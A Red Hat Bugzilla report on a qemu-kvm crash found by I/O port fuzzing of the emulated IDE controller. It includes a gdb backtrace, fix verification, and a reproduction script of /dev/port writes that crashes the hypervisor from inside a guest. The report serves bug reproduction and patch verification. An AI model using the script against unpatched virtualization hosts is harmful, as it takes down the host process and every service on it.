Bugzilla will be upgraded to version 5.0. The upgrade date is tentatively scheduled for 2 December 2018, pending final testing and feedback.
First Last Prev Next    This bug is not in your last search results.
Bug 1140145 - qemu-kvm crashed when doing iofuzz testing
qemu-kvm crashed when doing iofuzz testing
Status: CLOSED ERRATA
Product: Red Hat Enterprise Linux 7
Classification: Red Hat
Component: qemu-kvm-rhev (Show other bugs)
7.0
Unspecified Unspecified
high Severity unspecified
: rc
: ---
Assigned To: Kevin Wolf
Virtualization Bugs
:
Depends On:
Blocks:
  Show dependency treegraph
 
Reported: 2014-09-10 07:20 EDT by Kevin Wolf
Modified: 2015-03-05 04:55 EST (History)
15 users (show)

See Also:
Fixed In Version: qemu-kvm-rhev-2.1.0-4.el7
Doc Type: Bug Fix
Doc Text:
Story Points: ---
Clone Of: 1123372
Environment:
Last Closed: 2015-03-05 04:55:00 EST
Type: Bug
Regression: ---
Mount Type: ---
Documentation: ---
CRM:
Verified Versions:
Category: ---
oVirt Team: ---
RHEL 7.3 requirements from Atomic Host:
Cloudforms Team: ---

Attachments (Terms of Use)
Add an attachment (proposed patch, testcase, etc.)


External Trackers
Tracker ID Priority Status Summary Last Updated
Red Hat Product Errata RHSA-2015:0624 normal SHIPPED_LIVE Important: qemu-kvm-rhev security, bug fix, and enhancement update 2015-03-05 09:37:36 EST

  None (edit)
Comment 1 Miroslav Rezanina 2014-09-17 03:38:13 EDT 
Fix included in qemu-kvm-rhev-2.1.0-4.el7
Comment 3 Qian Guo 2014-10-20 03:30:37 EDT 
Reproduced this bug by qemu-kvm-rhev-2.1.0-3.el7.x86_64

Steps:
Boot guest :
/usr/libexec/qemu-kvm \
    -S  \
    -name 'virt-tests-vm1'  \
    -sandbox off  \
    -M pc  \
    -nodefaults  \
    -vga cirrus  \
    -chardev socket,id=qmp_id_qmpmonitor1,path=/tmp/monitor-qmpmonitor1-20141020-144555-MBmqGjFJ,server,nowait \
    -mon chardev=qmp_id_qmpmonitor1,mode=control  \
    -chardev socket,id=serial_id_serial0,path=/tmp/serial-serial0-20141020-144555-MBmqGjFJ,server,nowait \
    -device isa-serial,chardev=serial_id_serial0  \
    -chardev socket,id=seabioslog_id_20141020-144555-MBmqGjFJ,path=/tmp/seabios-20141020-144555-MBmqGjFJ,server,nowait \
    -device isa-debugcon,chardev=seabioslog_id_20141020-144555-MBmqGjFJ,iobase=0x402 \
    -device ich9-usb-uhci1,id=usb1,bus=pci.0,addr=03 \
    -drive id=drive_image1,if=none,cache=none,snapshot=off,aio=native,file=/root/staf-kvm-devel/autotest-devel/client/tests/virt/shared/data/images/rhel70-64-virtio.qcow2 \
    -device virtio-blk-pci,id=image1,drive=drive_image1,bootindex=0,bus=pci.0,addr=04 \
    -device virtio-net-pci,mac=9a:8d:8e:8f:90:91,id=id4sZgOo,vectors=4,netdev=idCltxru,bus=pci.0,addr=05  \
    -netdev tap,id=idCltxru,vhost=on,vhostfd=23,fd=22  \
    -m 4096  \
    -smp 1,cores=1,threads=1,sockets=1  \
    -cpu 'Opteron_G2',+kvm_pv_unhalt \
    -device usb-tablet,id=usb-tablet1,bus=usb1.0,port=1  \
    -vnc :0  \
    -rtc base=utc,clock=host,driftfix=slew  \
    -boot order=cdn,once=c,menu=off  \
    -no-kvm-pit-reinjection \
    -enable-kvm


2.Check the ioports, and confirm the ata_piix ioports
# cat /proc/ioports
2014-10-20 14:47:03: 0000-0cf7 : PCI Bus 0000:00
2014-10-20 14:47:03:   0000-001f : dma1
2014-10-20 14:47:03:   0020-0021 : pic1
2014-10-20 14:47:03:   0040-0043 : timer0
2014-10-20 14:47:03:   0050-0053 : timer1
2014-10-20 14:47:03:   0060-0060 : keyboard
2014-10-20 14:47:03:   0064-0064 : keyboard
2014-10-20 14:47:03:   0070-0071 : rtc0
2014-10-20 14:47:03:   0080-008f : dma page reg
2014-10-20 14:47:03:   00a0-00a1 : pic2
2014-10-20 14:47:03:   00c0-00df : dma2
2014-10-20 14:47:03:   00f0-00ff : fpu
2014-10-20 14:47:03:   0170-0177 : 0000:00:01.1
2014-10-20 14:47:03:     0170-0177 : ata_piix
2014-10-20 14:47:03:   01f0-01f7 : 0000:00:01.1
2014-10-20 14:47:03:     01f0-01f7 : ata_piix
2014-10-20 14:47:03:   0376-0376 : 0000:00:01.1
2014-10-20 14:47:03:     0376-0376 : ata_piix
2014-10-20 14:47:03:   03c0-03df : vga+
2014-10-20 14:47:03:   03f2-03f2 : floppy
2014-10-20 14:47:03:   03f4-03f5 : floppy
2014-10-20 14:47:03:   03f6-03f6 : 0000:00:01.1
2014-10-20 14:47:03:     03f6-03f6 : ata_piix
2014-10-20 14:47:03:   03f7-03f7 : floppy
2014-10-20 14:47:03:   03f8-03ff : serial
2014-10-20 14:47:03:   0600-063f : 0000:00:01.3
2014-10-20 14:47:03:     0600-0603 : ACPI PM1a_EVT_BLK
2014-10-20 14:47:03:     0604-0605 : ACPI PM1a_CNT_BLK
2014-10-20 14:47:03:     0608-060b : ACPI PM_TMR
2014-10-20 14:47:03:   0700-070f : 0000:00:01.3
2014-10-20 14:47:03:     0700-0707 : piix4_smbus
2014-10-20 14:47:03: 0cf8-0cff : PCI conf1
2014-10-20 14:47:03: 0d00-adff : PCI Bus 0000:00
2014-10-20 14:47:03: ae0f-aeff : PCI Bus 0000:00
2014-10-20 14:47:03: af20-afdf : PCI Bus 0000:00
2014-10-20 14:47:03: afe0-afe3 : ACPI GPE0_BLK
2014-10-20 14:47:03: afe4-ffff : PCI Bus 0000:00
2014-10-20 14:47:03:   c000-c03f : 0000:00:04.0
2014-10-20 14:47:03:     c000-c03f : virtio-pci
2014-10-20 14:47:03:   c040-c05f : 0000:00:03.0
2014-10-20 14:47:03:     c040-c05f : uhci_hcd
2014-10-20 14:47:03:   c060-c07f : 0000:00:05.0
2014-10-20 14:47:03:     c060-c07f : virtio-pci
2014-10-20 14:47:03:   c080-c08f : 0000:00:01.1
2014-10-20 14:47:03:     c080-c08f : ata_piix


3.Do iofuzz to the ata_piix ioports

Results:
qemu crashed:
(gdb) bt
#0  0x00007f6ea4fd097a in bdrv_acct_done (bs=0x0, cookie=cookie@entry=0x7f6ea7430f48) at block.c:5536
#1  0x00007f6ea4f44f7b in ide_flush_cb (opaque=0x7f6ea7430c80, ret=<optimized out>) at hw/ide/core.c:841
#2  0x00007f6ea4f45333 in ide_flush_cache (s=<optimized out>) at hw/ide/core.c:850
#3  0x00007f6ea4f45559 in cmd_flush_cache (s=<optimized out>, cmd=<optimized out>) at hw/ide/core.c:1226
#4  0x00007f6ea4f45609 in ide_exec_cmd (bus=<optimized out>, val=<optimized out>) at hw/ide/core.c:1758
#5  0x00007f6ea4dee3da in access_with_adjusted_size (addr=addr@entry=7, value=value@entry=0x7f6e977b0af0, size=size@entry=1, 
    access_size_min=<optimized out>, access_size_max=<optimized out>, access=0x7f6ea4dee550 <memory_region_write_accessor>, 
    mr=0x7f6ea743d680) at /usr/src/debug/qemu-2.1.0/memory.c:481
#6  0x00007f6ea4df2fa7 in memory_region_dispatch_write (size=1, data=234, addr=7, mr=0x7f6ea743d680)
    at /usr/src/debug/qemu-2.1.0/memory.c:1143
#7  io_mem_write (mr=mr@entry=0x7f6ea743d680, addr=7, val=<optimized out>, size=1) at /usr/src/debug/qemu-2.1.0/memory.c:1976
#8  0x00007f6ea4dbe343 in address_space_rw (as=0x7f6ea5445ce0 <address_space_io>, addr=addr@entry=375, 
    buf=0x7f6ea4ce3000 <Address 0x7f6ea4ce3000 out of bounds>, len=len@entry=1, is_write=is_write@entry=true)
    at /usr/src/debug/qemu-2.1.0/exec.c:2052
#9  0x00007f6ea4ded860 in kvm_handle_io (count=1, size=1, direction=<optimized out>, data=<optimized out>, port=375)
    at /usr/src/debug/qemu-2.1.0/kvm-all.c:1600
#10 kvm_cpu_exec (cpu=cpu@entry=0x7f6ea73aa400) at /usr/src/debug/qemu-2.1.0/kvm-all.c:1737
#11 0x00007f6ea4ddca02 in qemu_kvm_cpu_thread_fn (arg=0x7f6ea73aa400) at /usr/src/debug/qemu-2.1.0/cpus.c:874
#12 0x00007f6ea3892df3 in start_thread () from /usr/lib64/libpthread.so.0
#13 0x00007f6e9ee7c3dd in clone () from /usr/lib64/libc.so.6
(gdb) bt full
#0  0x00007f6ea4fd097a in bdrv_acct_done (bs=0x0, cookie=cookie@entry=0x7f6ea7430f48) at block.c:5536
        __PRETTY_FUNCTION__ = "bdrv_acct_done"
#1  0x00007f6ea4f44f7b in ide_flush_cb (opaque=0x7f6ea7430c80, ret=<optimized out>) at hw/ide/core.c:841
        s = 0x7f6ea7430c80
#2  0x00007f6ea4f45333 in ide_flush_cache (s=<optimized out>) at hw/ide/core.c:850
No locals.
#3  0x00007f6ea4f45559 in cmd_flush_cache (s=<optimized out>, cmd=<optimized out>) at hw/ide/core.c:1226
No locals.
#4  0x00007f6ea4f45609 in ide_exec_cmd (bus=<optimized out>, val=<optimized out>) at hw/ide/core.c:1758
        s = 0x7f6ea7430c80
        complete = <optimized out>
        __PRETTY_FUNCTION__ = "ide_exec_cmd"
#5  0x00007f6ea4dee3da in access_with_adjusted_size (addr=addr@entry=7, value=value@entry=0x7f6e977b0af0, size=size@entry=1, 
    access_size_min=<optimized out>, access_size_max=<optimized out>, access=0x7f6ea4dee550 <memory_region_write_accessor>, 
    mr=0x7f6ea743d680) at /usr/src/debug/qemu-2.1.0/memory.c:481
        access_mask = 255
        access_size = 1
        i = <optimized out>
#6  0x00007f6ea4df2fa7 in memory_region_dispatch_write (size=1, data=234, addr=7, mr=0x7f6ea743d680)
    at /usr/src/debug/qemu-2.1.0/memory.c:1143
No locals.
#7  io_mem_write (mr=mr@entry=0x7f6ea743d680, addr=7, val=<optimized out>, size=1) at /usr/src/debug/qemu-2.1.0/memory.c:1976
No locals.
#8  0x00007f6ea4dbe343 in address_space_rw (as=0x7f6ea5445ce0 <address_space_io>, addr=addr@entry=375, 
    buf=0x7f6ea4ce3000 <Address 0x7f6ea4ce3000 out of bounds>, len=len@entry=1, is_write=is_write@entry=true)
    at /usr/src/debug/qemu-2.1.0/exec.c:2052
        l = 1
        ptr = <optimized out>
        val = 234
        addr1 = 7
        mr = 0x7f6ea743d680
        error = false
#9  0x00007f6ea4ded860 in kvm_handle_io (count=1, size=1, direction=<optimized out>, data=<optimized out>, port=375)
    at /usr/src/debug/qemu-2.1.0/kvm-all.c:1600
        i = 0
        ptr = <optimized out>
#10 kvm_cpu_exec (cpu=cpu@entry=0x7f6ea73aa400) at /usr/src/debug/qemu-2.1.0/kvm-all.c:1737
        run = 0x7f6ea4ce2000
        ret = <optimized out>
        run_ret = <optimized out>
#11 0x00007f6ea4ddca02 in qemu_kvm_cpu_thread_fn (arg=0x7f6ea73aa400) at /usr/src/debug/qemu-2.1.0/cpus.c:874
        cpu = 0x7f6ea73aa400
        r = <optimized out>
#12 0x00007f6ea3892df3 in start_thread () from /usr/lib64/libpthread.so.0
No symbol table info available.
#13 0x00007f6e9ee7c3dd in clone () from /usr/lib64/libc.so.6
No symbol table info available.



So this bug is reproduced
Comment 4 Qian Guo 2014-10-20 05:40:42 EDT 
Verify this bug with 
qemu-kvm-rhev-2.1.2-3.el7.x86_64

steps:
1.Boot guest 
/usr/libexec/qemu-kvm -name 'virt-tests-vm1' -sandbox off -M pc -nodefaults -vga cirrus -chardev socket,id=qmp_id_qmpmonitor1,path=/tmp/monitor-qmpmonitor1-20141020-144555-MBmqGjFJ,server,nowait -mon chardev=qmp_id_qmpmonitor1,mode=control -chardev socket,id=serial_id_serial0,path=/tmp/serial-serial0-20141020-144555-MBmqGjFJ,server,nowait -device isa-serial,chardev=serial_id_serial0 -chardev socket,id=seabioslog_id_20141020-144555-MBmqGjFJ,path=/tmp/seabios-20141020-144555-MBmqGjFJ,server,nowait -device isa-debugcon,chardev=seabioslog_id_20141020-144555-MBmqGjFJ,iobase=0x402 -device ich9-usb-uhci1,id=usb1,bus=pci.0,addr=03 -drive id=drive_image1,if=none,cache=none,snapshot=off,aio=native,file=/root/staf-kvm-devel/autotest-devel/client/tests/virt/shared/data/images/rhel70-64-virtio.qcow2 -device virtio-blk-pci,id=image1,drive=drive_image1,bootindex=0,bus=pci.0,addr=04 -device virtio-net-pci,mac=9a:8d:8e:8f:90:91,id=id4sZgOo,vectors=4,netdev=idCltxru,bus=pci.0,addr=05 -netdev tap,id=idCltxru,vhost=on,script=/etc/qemu-ifup -m 4096 -smp 1,cores=1,threads=1,sockets=1 -cpu 'Opteron_G2',+kvm_pv_unhalt -device usb-tablet,id=usb-tablet1,bus=usb1.0,port=1 -vnc :0 -rtc base=utc,clock=host,driftfix=slew -boot order=cdn,once=c,menu=off -no-kvm-pit-reinjection -enable-kvm -monitor stdio

2.In guest, do iofuzz to the "ata_piix" (which can hit crash as reproduced):
# cat iofuzz.sh 
 dd if=/dev/port seek=368 of=/dev/null bs=1 count=1                         
 dd if=/dev/port seek=369 of=/dev/null bs=1 count=1                         
 dd if=/dev/port seek=370 of=/dev/null bs=1 count=1                         
 dd if=/dev/port seek=371 of=/dev/null bs=1 count=1                         
 dd if=/dev/port seek=372 of=/dev/null bs=1 count=1                         
 dd if=/dev/port seek=373 of=/dev/null bs=1 count=1                         
 dd if=/dev/port seek=374 of=/dev/null bs=1 count=1                         
 dd if=/dev/port seek=375 of=/dev/null bs=1 count=1                         
 echo -e '\0' | dd of=/dev/port seek=368 bs=1 count=1                       
 echo -e '\0' | dd of=/dev/port seek=369 bs=1 count=1                       
 echo -e '\0' | dd of=/dev/port seek=370 bs=1 count=1                       
 echo -e '\0' | dd of=/dev/port seek=371 bs=1 count=1                       
 echo -e '\0' | dd of=/dev/port seek=372 bs=1 count=1                       
 echo -e '\0' | dd of=/dev/port seek=373 bs=1 count=1                       
 echo -e '\0' | dd of=/dev/port seek=374 bs=1 count=1                       
 echo -e '\0' | dd of=/dev/port seek=375 bs=1 count=1                       
 echo -e '\0102' | dd of=/dev/port seek=370 bs=1 count=1                    
 echo -e '\0372' | dd of=/dev/port seek=368 bs=1 count=1                    
 echo -e '\060' | dd of=/dev/port seek=371 bs=1 count=1                     
 echo -e '\034' | dd of=/dev/port seek=372 bs=1 count=1                     
 echo -e '\026' | dd of=/dev/port seek=369 bs=1 count=1                     
 echo -e '\063' | dd of=/dev/port seek=372 bs=1 count=1                     
 echo -e '\041' | dd of=/dev/port seek=374 bs=1 count=1                     
 echo -e '\0365' | dd of=/dev/port seek=372 bs=1 count=1                    
 echo -e '\06' | dd of=/dev/port seek=372 bs=1 count=1                      
 echo -e '\0106' | dd of=/dev/port seek=371 bs=1 count=1                    
 echo -e '\0156' | dd of=/dev/port seek=374 bs=1 count=1                    
 echo -e '\01' | dd of=/dev/port seek=370 bs=1 count=1                      
 echo -e '\0317' | dd of=/dev/port seek=369 bs=1 count=1                    
 echo -e '\023' | dd of=/dev/port seek=374 bs=1 count=1                     
 echo -e '\053' | dd of=/dev/port seek=374 bs=1 count=1                     
 echo -e '\0153' | dd of=/dev/port seek=370 bs=1 count=1                    
 echo -e '\05' | dd of=/dev/port seek=369 bs=1 count=1                      
 echo -e '\0233' | dd of=/dev/port seek=375 bs=1 count=1                    
 echo -e '\0250' | dd of=/dev/port seek=371 bs=1 count=1                    
 echo -e '\0140' | dd of=/dev/port seek=375 bs=1 count=1                    
 echo -e '\0150' | dd of=/dev/port seek=373 bs=1 count=1                    
 echo -e '\0334' | dd of=/dev/port seek=374 bs=1 count=1                    
 echo -e '\0360' | dd of=/dev/port seek=375 bs=1 count=1                    
 echo -e '\0372' | dd of=/dev/port seek=371 bs=1 count=1                    
 echo -e '\0202' | dd of=/dev/port seek=371 bs=1 count=1                    
 echo -e '\0160' | dd of=/dev/port seek=375 bs=1 count=1                    
 echo -e '\0316' | dd of=/dev/port seek=368 bs=1 count=1                    
 echo -e '\043' | dd of=/dev/port seek=370 bs=1 count=1                     
 echo -e '\0121' | dd of=/dev/port seek=371 bs=1 count=1                    
 echo -e '\0153' | dd of=/dev/port seek=375 bs=1 count=1                    
 echo -e '\071' | dd of=/dev/port seek=369 bs=1 count=1                     
 echo -e '\0153' | dd of=/dev/port seek=370 bs=1 count=1                    
 echo -e '\0302' | dd of=/dev/port seek=375 bs=1 count=1                    
 echo -e '\0275' | dd of=/dev/port seek=375 bs=1 count=1                    
 echo -e '\0170' | dd of=/dev/port seek=372 bs=1 count=1                    
 echo -e '\0302' | dd of=/dev/port seek=370 bs=1 count=1                    
 echo -e '\0377' | dd of=/dev/port seek=369 bs=1 count=1                    
 echo -e '\0310' | dd of=/dev/port seek=369 bs=1 count=1                    
 echo -e '\0153' | dd of=/dev/port seek=372 bs=1 count=1                    
 echo -e '\0101' | dd of=/dev/port seek=368 bs=1 count=1                    
 echo -e '\056' | dd of=/dev/port seek=373 bs=1 count=1                     
 echo -e '\0126' | dd of=/dev/port seek=374 bs=1 count=1                    
 echo -e '\0124' | dd of=/dev/port seek=369 bs=1 count=1                    
 echo -e '\0131' | dd of=/dev/port seek=370 bs=1 count=1                    
 echo -e '\0272' | dd of=/dev/port seek=369 bs=1 count=1                    
 echo -e '\03' | dd of=/dev/port seek=370 bs=1 count=1                      
 echo -e '\017' | dd of=/dev/port seek=375 bs=1 count=1                     
 echo -e '\0160' | dd of=/dev/port seek=371 bs=1 count=1                    
 echo -e '\0117' | dd of=/dev/port seek=368 bs=1 count=1                    
 echo -e '\0334' | dd of=/dev/port seek=369 bs=1 count=1                    
 echo -e '\0353' | dd of=/dev/port seek=371 bs=1 count=1                    
 echo -e '\072' | dd of=/dev/port seek=375 bs=1 count=1                     
 echo -e '\0213' | dd of=/dev/port seek=371 bs=1 count=1                    
 echo -e '\0351' | dd of=/dev/port seek=372 bs=1 count=1                    
 echo -e '\0271' | dd of=/dev/port seek=373 bs=1 count=1                    
 echo -e '\0210' | dd of=/dev/port seek=374 bs=1 count=1                    
 echo -e '\0127' | dd of=/dev/port seek=375 bs=1 count=1                    
 echo -e '\067' | dd of=/dev/port seek=371 bs=1 count=1                     
 echo -e '\064' | dd of=/dev/port seek=374 bs=1 count=1                     
 echo -e '\0251' | dd of=/dev/port seek=374 bs=1 count=1                    
 echo -e '\0352' | dd of=/dev/port seek=375 bs=1 count=1


# sh iofuzz.sh

result: no crash, so this bug is fixed.
Comment 6 errata-xmlrpc 2015-03-05 04:55:00 EST 
Since the problem described in this bug report should be
resolved in a recent advisory, it has been closed with a
resolution of ERRATA.

For information on the advisory, and where to find the updated
files, follow the link below.

If the solution does not work for you, open a new bug report.

https://rhn.redhat.com/errata/RHSA-2015-0624.html
Note You need to log in before you can comment on or make changes to this bug.
First Last Prev Next    This bug is not in your last search results.